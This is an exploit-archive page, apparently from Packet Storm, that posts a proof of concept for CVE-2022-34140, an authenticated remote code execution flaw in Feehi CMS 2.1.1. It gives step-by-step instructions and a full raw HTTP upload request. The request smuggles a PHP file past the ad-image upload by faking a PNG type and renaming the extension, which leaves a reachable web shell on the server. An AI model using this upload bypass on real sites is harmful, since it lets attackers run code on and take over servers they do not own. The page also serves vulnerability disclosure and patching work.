exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Feehi CMS 2.1.1 Remote Code Execution

Feehi CMS 2.1.1 Remote Code Execution
Posted Sep 23, 2022
Authored by yuyudhn

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2022-34140
SHA-256 | 983f5ef29aec5a308538a5a0f342863532963a034a2146d2f5d3fe9bcb54fe54

Feehi CMS 2.1.1 Remote Code Execution

Change Mirror Download
# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 22-08-2022
# Exploit Author: yuyudhn
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Docker
# CVE : CVE-2022-34140



# Proof of Concept:
1. Login using admin account at http://feehi-cms.local/admin
2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex
3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.
5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php

# Burp request example:

POST /admin/index.php?r=ad%2Fcreate HTTP/1.1
Host: feehi-cms.local
Content-Length: 1530
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://feehi-cms.local
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D

Connection: close



------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="_csrf_backend"



FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[name]"



rce

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[tips]"



rce at Ad management

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[input_type]"



1

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[ad]"





------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"

Content-Type: image/png



<?php phpinfo();



------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[link]"





--------------

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close